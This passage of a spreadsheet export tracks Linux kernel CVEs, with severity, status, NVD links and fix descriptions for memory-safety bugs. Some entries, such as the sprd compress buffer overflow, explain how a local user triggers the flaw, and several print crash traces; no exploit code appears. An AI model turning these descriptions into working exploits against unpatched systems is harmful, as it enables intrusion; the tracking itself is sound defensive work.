ASoC: sprd: validate compress buffer sizes against fixed allocations
sprd_platform_compr_open() allocates the stage 0 IRAM buffer (32K data
area) and the stage 1 DDR buffer (2M data area) with fixed sizes, but
sprd_platform_compr_copy() derives all copy lengths from the user
controlled runtime-&gt;fragment_size and the write() count, never
comparing them against the physical buffer sizes. The compress core
only checks fragment_size * fragments for an u32 overflow in
snd_compress_check_input(), so a local user can configure a logical
buffer of up to ~4GB via SNDRV_COMPRESS_SET_PARAMS, far exceeding the
fixed allocations.
A fragment_size larger than the 32K IRAM data area makes the stage 0
copy_from_user() overflow past the IRAM allocation, and a buffer_size
larger than the 2M DDR buffer makes the wrapping copy at the end of
sprd_platform_compr_copy() write fully user controlled data past the
buffer. No SNDRV_PCM_TRIGGER_START is needed, a write() in SETUP
state reaches the copy callback directly.
Reject parameters that do not fit into the fixed buffers in
set_params(), and fix the advertised max fragment size: 128K never
fitted into the 32K IRAM buffer. The caps values may have been carried over
from the qdsp6 driver, which allocates its buffers according to the
advertised maxima, unlike this driver. With 32K as max fragment size
the advertised limits are self-consistent: 32K * 64 = 2M equals the
DDR buffer size.
Discovered by Atuin - Automated Vulnerability Discovery Engine.</t>
        </is>
      </c>
      <c r="T105" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97910</t>
        </is>
      </c>
    </row>
    <row r="106">
      <c r="A106" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B106" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C106" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97911</t>
        </is>
      </c>
      <c r="D106" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E106" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F106" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G106" s="5" t="inlineStr"/>
      <c r="H106" s="5" t="inlineStr"/>
      <c r="I106" s="5" t="inlineStr"/>
      <c r="J106" s="5" t="inlineStr"/>
      <c r="K106" s="5" t="inlineStr"/>
      <c r="L106" s="5" t="inlineStr"/>
      <c r="M106" s="5" t="inlineStr"/>
      <c r="N106" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O106" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P106" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q106" s="5" t="inlineStr"/>
      <c r="R106" s="5" t="inlineStr"/>
      <c r="S106" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
accel: ethosu: Ensure SRAM region size matches job
It is possible for userspace to set the job SRAM size to 0, but then still
have SRAM accesses in the command stream. When the job SRAM size is 0,
setting the region base register is skipped and a stale base address from
a prior job is used.
Check the region size against the job's SRAM size instead of just the size
of the SRAM. The job's SRAM size was already checked against the total SRAM
size.</t>
        </is>
      </c>
      <c r="T106" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97911</t>
        </is>
      </c>
    </row>
    <row r="107">
      <c r="A107" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B107" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C107" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97937</t>
        </is>
      </c>
      <c r="D107" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E107" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F107" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G107" s="5" t="inlineStr"/>
      <c r="H107" s="5" t="inlineStr"/>
      <c r="I107" s="5" t="inlineStr"/>
      <c r="J107" s="5" t="inlineStr"/>
      <c r="K107" s="5" t="inlineStr"/>
      <c r="L107" s="5" t="inlineStr"/>
      <c r="M107" s="5" t="inlineStr"/>
      <c r="N107" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O107" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P107" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q107" s="5" t="inlineStr"/>
      <c r="R107" s="5" t="inlineStr"/>
      <c r="S107" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ftrace: fork: Initialize function graph state before copy_exec_state()
dup_task_struct() copies the parent's task_struct, including ret_stack.
ftrace_graph_init_task() clears the copied function graph state, but it
currently runs after copy_exec_state().
For non-CLONE_VM forks, copy_exec_state() allocates a new task_exec_state.
If that allocation fails, copy_process() reaches bad_fork_free and
free_task() calls ftrace_graph_exit_task(). Since the child still carries
the parent's ret_stack pointer, the unwind frees the parent's active
function graph return stack. The parent subsequently accesses freed memory
from function_graph_enter_regs().
KASAN reports:
[   22.190920] ==================================================================
[   22.195899] BUG: KASAN: slab-use-after-free in function_graph_enter_regs+0xa76/0xb90
[   22.200747] Write of size 8 at addr ff110000054dc0a8 by task repro/1
[   22.205134]
[   22.210770] CPU: 0 UID: 0 PID: 1 Comm: repro Not tainted 7.2.0-07732-g9328b3b03bdc-dirty #3 PREEMPT(lazy)
[   22.212576] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014
[   22.213750] Call Trace:
[   22.215271]  &lt;TASK&gt;
[   22.216242]  ? ftrace_stub_direct_tramp+0x10/0x10
[   22.217774]  dump_stack_lvl+0x4e/0x70
[   22.220531]  print_report+0x157/0x4b4
[   22.223202]  ? fixup_red_left+0x9/0x30
[   22.224407]  ? complete_report_info+0x83/0x110
[   22.226679]  ? function_graph_enter_regs+0xa76/0xb90
[   22.228084]  kasan_report+0xce/0x100
[   22.230109]  ? function_graph_enter_regs+0xa76/0xb90
[   22.232860]  ? stack_trace_save+0x4/0xd0
[   22.234156]  function_graph_enter_regs+0xa76/0xb90
[   22.236090]  ? kasan_save_stack+0x30/0x50
[   22.237752]  ? __pfx_function_graph_enter_regs+0x10/0x10
[   22.238694]  ? ring_buffer_lock_reserve+0x345/0xf80
[   22.239628]  ? stack_trace_save+0x4/0xd0
[   22.242121]  ? stack_trace_save+0x4/0xd0
[   22.243588]  ftrace_graph_func+0xda/0x160
[   22.245362]  ? ftrace_stub_direct_tramp+0x10/0x10
[   22.246520]  0xffffffffa0000095
[   22.250528]  ? stack_trace_save+0x9/0xd0
[   22.251757]  ? ring_buffer_unlock_commit+0x11d/0x5c0
[   22.253152]  stack_trace_save+0x9/0xd0
[   22.254264]  kasan_save_stack+0x30/0x50
[   22.273631]  kasan_save_track+0x14/0x30
[   22.276763]  kasan_save_free_info+0x3b/0x70
[   22.278296]  __kasan_slab_free+0x43/0x70
[   22.280157]  kmem_cache_free+0xbf/0x3b0
[   22.282963]  ? ftrace_stub_direct_tramp+0x10/0x10
[   22.284001]  free_task+0xa2/0x160
[   22.285699]  ? ftrace_stub_direct_tramp+0x10/0x10
[   22.286752]  copy_process+0x2aae/0x7bc0
Initialize the child function graph state immediately after
dup_task_struct(), before the first fallible operation.</t>
        </is>
      </c>
      <c r="T107" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97937</t>
        </is>
      </c>
    </row>
    <row r="108">
      <c r="A108" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B108" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C108" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97940</t>
        </is>
      </c>
      <c r="D108" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E108" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F108" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G108" s="5" t="inlineStr"/>
      <c r="H108" s="5" t="inlineStr"/>
      <c r="I108" s="5" t="inlineStr"/>
      <c r="J108" s="5" t="inlineStr"/>
      <c r="K108" s="5" t="inlineStr"/>
      <c r="L108" s="5" t="inlineStr"/>
      <c r="M108" s="5" t="inlineStr"/>
      <c r="N108" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O108" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P108" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q108" s="5" t="inlineStr"/>
      <c r="R108" s="5" t="inlineStr"/>
      <c r="S108" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ipv6: fix fib6 walker UAF on seq stop
ipv6_route_iter_active() treats a walker in FWS_U at the table root as
already unlinked. fib6_del_route() can move a still-linked walker into
that same state when the current leaf is the last route at the root,
so ipv6_route_native_seq_stop() skips fib6_walker_unlink(). The seq
private object can then be freed while it remains on
net-&gt;ipv6.fib6_walkers. A later route deletion walks the dangling list
and uses the freed walker.
Use the list head as membership state and reinitialize it when
unlinking. Keep the existing w-&gt;node check so a never-started iterator
with a zeroed private object is not treated as linked.
The same stop helper is used by /proc/net/ipv6_route and by the BPF
ipv6_route iterator. The BPF show path only widens the race.</t>
        </is>
      </c>
      <c r="T108" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97940</t>
        </is>
      </c>
    </row>
    <row r="109">
      <c r="A109" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B109" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C109" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97941</t>
        </is>
      </c>
      <c r="D109" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E109" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F109" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G109" s="5" t="inlineStr"/>
      <c r="H109" s="5" t="inlineStr"/>
      <c r="I109" s="5" t="inlineStr"/>
      <c r="J109" s="5" t="inlineStr"/>
      <c r="K109" s="5" t="inlineStr"/>
      <c r="L109" s="5" t="inlineStr"/>
      <c r="M109" s="5" t="inlineStr"/>
      <c r="N109" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O109" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P109" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q109" s="5" t="inlineStr"/>
      <c r="R109" s="5" t="inlineStr"/>
      <c r="S109" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
mm/slab: take n-&gt;list_lock in __slab_try_return_freelist() to avoid race
Commit ba7425312607 ("mm, slab: add an optimistic
__slab_try_return_freelist()") incorrectly assumed that nobody has freed
an object to the slab as long as slab-&gt;freelist is NULL and cmpxchg
succeeds.
However, as reported by Hyunwoo Kim [1], other CPUs might have freed
an object to the slab, insert the slab to the partial list, then
allocated an object from the slab, and be in the middle of removing
the slab from the list under n-&gt;list_lock.
Since __refill_objects_node() puts the slab back on pc.slabs
outside n-&gt;list_lock, it might insert the slab into that list while
the slab is concurrently being removed from n-&gt;partial.
This led to a list corruption [1]:
  list_add corruption. next-&gt;prev should be prev
  (ffff888100000248), but was dead000000000122.
  (next=ffffea000416e410).
  kernel BUG at lib/list_debug.c:29!
  Oops: invalid opcode: 0000 [#1] SMP NOPTI
  CPU: 1 UID: 65534 PID: 144 Comm: poc Not tainted
  7.2.0-16172-gcf72cbb39da8-dirty #1 PREEMPT(lazy)
  RIP: 0010:__list_add_valid_or_report+0x80/0xd0
  ...
  Call Trace:
   alloc_from_new_slab+0x183/0x300
   ___slab_alloc+0x31c/0x890
   __kmalloc_noprof+0x3d4/0x800
   lsm_blob_alloc+0x2d/0x50
   security_msg_msg_alloc+0x26/0x90
   load_msg+0x1aa/0x210
   do_msgsnd+0x91/0x800
   do_syscall_64+0x109/0x5d0
   entry_SYSCALL_64_after_hwframe+0x77/0x7f
  ...
  Kernel panic - not syncing: Fatal exception
This is a classic ABA problem where cmpxchg succeeds but the state has
changed since __refill_objects_node() took the freelist from the slab.
As Vlastimil Babka mentioned [2], it should be rare to return more than
one slab (due to the racy read of slab-&gt;counters in
get_partial_node_bulk()). Therefore, instead of introducing additional
complexity, acquire and release n-&gt;list_lock twice in the worst case.
Return the slab directly to the partial list and hold n-&gt;list_lock
across the cmpxchg and add_partial(). This is similar to the initial
version of commit ba7425312607 [3]. This is enough to avoid the race as
the list manipulation is serialized by n-&gt;list_lock. While at it,
bring back unlikely() hint now that the condition is unlikely.</t>
        </is>
      </c>
      <c r="T109" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97941</t>
        </is>
      </c>
    </row>
    <row r="110">
      <c r="A110" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B110" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C110" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97971</t>
        </is>
      </c>
      <c r="D110" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E110" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F110" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G110" s="5" t="inlineStr"/>
      <c r="H110" s="5" t="inlineStr"/>
      <c r="I110" s="5" t="inlineStr"/>
      <c r="J110" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K110" s="5" t="inlineStr"/>
      <c r="L110" s="5" t="inlineStr"/>
      <c r="M110" s="5" t="inlineStr"/>
      <c r="N110" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O110" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P110" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q110" s="5" t="inlineStr"/>
      <c r="R110" s="5" t="inlineStr"/>
      <c r="S110" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nstree: check listing permission before taking a namespace reference
legitimize_ns() takes a reference on the candidate namespace before
may_list_ns() has decided whether the caller may see it. The
__free(ns_put) cleanup on the denied path can drop the last reference to a
mount namespace while we still hold the rcu read lock, and put_mnt_ns()
may sleep there. This is the same problem commit 2ec2aff3c8e2 ("ns: make
sure reference are dropped outside of rcu lock") fixed for the put_user()
path. Neither ns_requested() nor may_list_ns() needs a reference, both
only look at the namespace type and at the caller's own namespaces, so do
the checks first and take the reference last.
Splat:
  Voluntary context switch within RCU read-side critical section!
  WARNING: kernel/rcu/tree_plugin.h:332 at rcu_note_context_switch+0x238/0x2a0, CPU#5: a/3442
  CPU: 5 UID: 1000 PID: 3442 Comm: a Not tainted 7.0.0-30-generic #30-Ubuntu PREEMPT(lazy)
  RIP: 0010:rcu_note_context_switch+0x238/0x2a0
  Call Trace:
   &lt;TASK&gt;
   __schedule+0xcf/0x650
   schedule+0x27/0x90
   schedule_preempt_disabled+0x15/0x30
   __mutex_lock.constprop.0+0x550/0xaf0
   __mutex_lock_slowpath+0x13/0x20
   mutex_lock+0x3b/0x50
   exp_funnel_lock+0xb2/0x260
   synchronize_rcu_expedited+0xe7/0x220
   namespace_unlock+0x26a/0x320
   put_mnt_ns+0xd3/0x120
   mntns_put+0xe/0x20
   do_listns+0x13e/0x560
   __do_sys_listns+0x126/0x2d0
   __x64_sys_listns+0x20/0x30
   x64_sys_call+0x2366/0x2390
   do_syscall_64+0x105/0x5a0
   entry_SYSCALL_64_after_hwframe+0x76/0x7e
   &lt;/TASK&gt;</t>
        </is>
      </c>
      <c r="T110" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97971</t>
        </is>
      </c>
    </row>
    <row r="111">
      <c r="A111" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B111" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C111" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97991</t>
        </is>
      </c>
      <c r="D111" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E111" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F111" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G111" s="5" t="inlineStr"/>
      <c r="H111" s="5" t="inlineStr"/>
      <c r="I111" s="5" t="inlineStr"/>
      <c r="J111" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K111" s="5" t="inlineStr"/>
      <c r="L111" s="5" t="inlineStr"/>
      <c r="M111" s="5" t="inlineStr"/>
      <c r="N111" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O111" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P111" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q111" s="5" t="inlineStr"/>
      <c r="R111" s="5" t="inlineStr"/>
      <c r="S111" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
vdpa_sim_blk: reject out-of-range sector starts
vdpasim_blk_check_range() logs an invalid start sector but continues
validating the request.  The subsequent unsigned capacity subtraction can
underflow and let an out-of-range buffer offset reach the data path.
The invalid offset is used by three request paths.  VIRTIO_BLK_T_OUT
copies guest data to blk-&gt;buffer + offset through
vringh_iov_pull_iotlb(), causing an out-of-bounds write in
_copy_from_iter() or memcpy().  VIRTIO_BLK_T_IN copies from
blk-&gt;buffer + offset to the guest through vringh_iov_push_iotlb(),
causing an out-of-bounds read in _copy_to_iter().
VIRTIO_BLK_T_WRITE_ZEROES passes blk-&gt;buffer + offset to memset(),
causing an out-of-bounds write.
Reject starts at or beyond the capacity before the subtraction.  Treat the
capacity boundary as invalid because the IN and OUT paths round byte counts
down to sectors for validation but later copy the original byte counts.  A
sub-sector request at the capacity boundary would otherwise still access
past the end of the buffer.
I found this bug myself, though the patch was written with AI assistance.</t>
        </is>
      </c>
      <c r="T111" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97991</t>
        </is>
      </c>
    </row>
    <row r="112">
      <c r="A112" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B112" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C112" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98002</t>
        </is>
      </c>
      <c r="D112" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E112" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F112" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G112" s="5" t="inlineStr"/>
      <c r="H112" s="5" t="inlineStr"/>
      <c r="I112" s="5" t="inlineStr"/>
      <c r="J112" s="5" t="inlineStr"/>
      <c r="K112" s="5" t="inlineStr"/>
      <c r="L112" s="5" t="inlineStr"/>
      <c r="M112" s="5" t="inlineStr"/>
      <c r="N112" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O112" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P112" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q112" s="5" t="inlineStr"/>
      <c r="R112" s="5" t="inlineStr"/>
      <c r="S112" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
iommu/amd: Fix ineffective error check in nested domain allocation
amd_iommu_pdom_id_alloc() returns an int: a domain ID on success, or the
negative errno from ida_alloc_range() when the ID space is exhausted or
memory is short.  amd_iommu_alloc_domain_nested() stores that return value
in gdom_info-&gt;hdom_id, which is a u32, and only then tests it:
	gdom_info-&gt;hdom_id = amd_iommu_pdom_id_alloc();
	if (gdom_info-&gt;hdom_id &lt;= 0) {
The assignment discards the sign, so -ENOSPC becomes 0xffffffe4 and the
test never fires.  The nested domain is then set up with a host domain ID
that was never allocated, instead of the allocation failing with -ENOSPC.
Keep the value in an int, test it there, and store it only once it is
known to be valid, which is what the other amd_iommu_pdom_id_alloc()
callers already do.</t>
        </is>
      </c>
      <c r="T112" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98002</t>
        </is>
      </c>
    </row>
    <row r="113">
      <c r="A113" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B113" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C113" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98017</t>
        </is>
      </c>
      <c r="D113" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E113" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F113" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G113" s="5" t="inlineStr"/>
      <c r="H113" s="5" t="inlineStr"/>
      <c r="I113" s="5" t="inlineStr"/>
      <c r="J113" s="5" t="inlineStr"/>
      <c r="K113" s="5" t="inlineStr"/>
      <c r="L113" s="5" t="inlineStr"/>
      <c r="M113" s="5" t="inlineStr"/>
      <c r="N113" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O113" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P113" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q113" s="5" t="inlineStr"/>
      <c r="R113" s="5" t="inlineStr"/>
      <c r="S113" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/sched: defer qdisc freeing after failed creation
An RTM_NEWQDISC request can make clsact bind a populated shared ingress
block during -&gt;init(), publishing an embedded mini_Qdisc to lockless
readers.  If the same request has an invalid TCA_RATE, estimator setup
fails after -&gt;init(); the unwind removes the pointer but synchronously
frees its containing qdisc while tc_run() may still hold it.
Retire failed qdiscs through the same RCU helper as normal destruction.
Inline the synchronous free into the callback now that no direct callers
remain.</t>
        </is>
      </c>
      <c r="T113" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98017</t>
        </is>
      </c>
    </row>
    <row r="114">
      <c r="A114" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B114" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C114" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98023</t>
        </is>
      </c>
      <c r="D114" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E114" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F114" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G114" s="5" t="inlineStr"/>
      <c r="H114" s="5" t="inlineStr"/>
      <c r="I114" s="5" t="inlineStr"/>
      <c r="J114" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K114" s="5" t="inlineStr"/>
      <c r="L114" s="5" t="inlineStr"/>
      <c r="M114" s="5" t="inlineStr"/>
      <c r="N114" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O114" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P114" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q114" s="5" t="inlineStr"/>
      <c r="R114" s="5" t="inlineStr"/>
      <c r="S114" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
vxlan: reject dynamic fdb entries that reference a nexthop id
The commit cited in the Fixes tag allowed VXLAN FDB entries to point to
FDB nexthops so that overlay traffic could be load balanced across
multiple VTEPs. Such entries can only be configured from user space,
cannot be learned and cannot roam. They only make sense with a user space
control plane such as E-VPN where data plane learning is disabled.
Despite that, the VXLAN driver does not currently prevent such entries
from being configured with the "dynamic" flag. The per-nexthop FDB list
is only protected by the per-device hash lock, which is not sufficient
when two VXLAN devices point to the same FDB nexthop and therefore share
the list. Aging runs in softirq context without RTNL, so an entry deleted
by one device can race with an addition or deletion from the other,
leading to list corruption:
  list_del corruption. next-&gt;prev should be ffff8881069d9548, but was
  dead000000000122. (next=ffff8881069d9448)
  WARNING: CPU: 0 PID: 90 at lib/list_debug.c:65
  __list_del_entry_valid_or_report+0x1aa/0x210
  ...
   vxlan_fdb_destroy+0x5b8/0xad0
   vxlan_cleanup+0x328/0x450
   call_timer_fn+0x2a/0x1c0
   run_timer_softirq+0x18c/0x210
  BUG: KASAN: slab-use-after-free in vxlan_fdb_destroy
Fix this by rejecting the bogus configuration of dynamic FDB entries that
point to FDB nexthops, both when created and when an existing entry is
updated. As such, the per-nexthop FDB list is only ever mutated under the
RTNL lock. Add test cases to make sure that this does not regress in the
future.</t>
        </is>
      </c>
      <c r="T114" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98023</t>
        </is>
      </c>
    </row>
    <row r="115">
      <c r="A115" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B115" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C115" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98052</t>
        </is>
      </c>
      <c r="D115" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E115" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F115" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G115" s="5" t="inlineStr"/>
      <c r="H115" s="5" t="inlineStr"/>
      <c r="I115" s="5" t="inlineStr"/>
      <c r="J115" s="5" t="inlineStr"/>
      <c r="K115" s="5" t="inlineStr"/>
      <c r="L115" s="5" t="inlineStr"/>
      <c r="M115" s="5" t="inlineStr"/>
      <c r="N115" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O115" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P115" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q115" s="5" t="inlineStr"/>
      <c r="R115" s="5" t="inlineStr"/>
      <c r="S115" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: bcmasp: clear txcb-&gt;last before writing each descriptor
bcmasp_xmit() only wrote txcb-&gt;last = true for the final fragment
of an SKB; non-final fragments left the field untouched.  If a
descriptor slot was reused while it still held a stale true from
a previous SKB (possible when tx_spb_ring_full() underreported
fullness), bcmasp_tx_reclaim() would see last == true mid-SKB and
call dev_consume_skb_any() prematurely, freeing the sk_buff while
its remaining fragments were still in flight.
Unconditionally clear txcb-&gt;last before the conditional set so every
descriptor slot starts from a known false state regardless of what a
prior transmission left behind.</t>
        </is>
      </c>
      <c r="T115" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98052</t>
        </is>
      </c>
    </row>
    <row r="116">
      <c r="A116" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B116" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C116" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98073</t>
        </is>
      </c>
      <c r="D116" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E116" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F116" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G116" s="5" t="inlineStr"/>
      <c r="H116" s="5" t="inlineStr"/>
      <c r="I116" s="5" t="inlineStr"/>
      <c r="J116" s="5" t="inlineStr">
        <is>
          <t>f5, go, gin</t>
        </is>
      </c>
      <c r="K116" s="5" t="inlineStr"/>
      <c r="L116" s="5" t="inlineStr"/>
      <c r="M116" s="5" t="inlineStr"/>
      <c r="N116" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O116" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P116" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
